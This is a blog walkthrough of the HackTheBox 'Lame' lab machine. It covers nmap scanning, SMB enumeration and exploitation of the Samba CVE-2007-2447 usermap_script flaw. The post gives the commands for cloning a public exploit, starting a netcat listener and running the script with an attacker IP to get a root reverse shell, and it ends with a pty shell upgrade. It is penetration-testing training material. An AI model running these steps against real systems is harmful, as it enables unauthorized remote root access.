Open in app

Sign in

Write

Sign in

HacktheBox — Lame Walkthrough

serkanbenol
4 min readJul 6, 2022

Hello all! This is my second OSCP-like machine walkthrough. Let’s start!

Attacker IP: 10.10.14.53 ; Target IP: 10.129.77.189

  1. nmap -Pn -sVC 10.129.77.189
  • Pn : Do not ping the target machine
  • -sVC : Version & Basic Scripts that work on the machine

2. The results:

  • 21/ tcp :ftp service with vsftpd 2.3.4
  • 22/tcp : ssh service with OpenSSH 4.7p1
  • 139/tcp netbios Samba (smbd 3.X-4.X)
  • 445/tcp netbios Samba (sbmd 3.0.20)

3. We see that ftp has an anonymous login. Let’s try if we find any valuable information:
ftp 10.129.77.189

4. Although the login is successful we see there is nothing interesting here.

5. Let’s try samba ports 139&445 with smbmap. This is a handy enumeration tool which brings us about shares, drive permissions etc.
You can find it here : https://github.com/ShawnDEvans/smbmap
The main command is: smbmap -H 10.129.77.189 where -H denotes the target host.

What we see is tmp directory is interesting, at least we have read&write permissions. However it doesn’t let us connect.
smbclient -N //10.129.77.189/tmp

Turns out smbclient has made it harder to work with insecure versions of the protocol, one way to get around this without messing up the configuration file is by stating the protocols accepted in the command itself.

But we found nothing. Now let’s look for public exploits about the service samba v3.0.20

6. searchsploit 3.0.20

There is a Command Execution exploit hercate however it’s a metasploit module which is beyond our aim though if its CVE searched with the command:
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE

It’s CVE 2007–2447. The next step is googling it.

7. There is a nice samba script for this CVE in this github repo:
https://github.com/amriunix/CVE-2007-2447

8. The next step is cloning the exploit.
git clone https://github.com/amriunix/CVE-2007–2447.git

9. To use the script we need to download pysmb

pip3 install pysmb

10. Before using the exploit let’s open a listener with netcat:
nc -lvnp 4444

11. The following step is executing the script with
python3 usermap_script.py 10.129.77.189 139 10.10.14.53 4444

Look’s like we’re root! Congrats. The next step is having a more interactive shell and finding the flags: python -c ‘import pty; pty.spawn(“/bin/sh”)’

Let’s try the user.txt this time.

Hackthebox
Hackthebox Writeup
Hackthebox Walkthrough
Cybersecurity
Oscp

--

--

serkanbenol

Written by serkanbenol

11 Followers

#eJPT

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams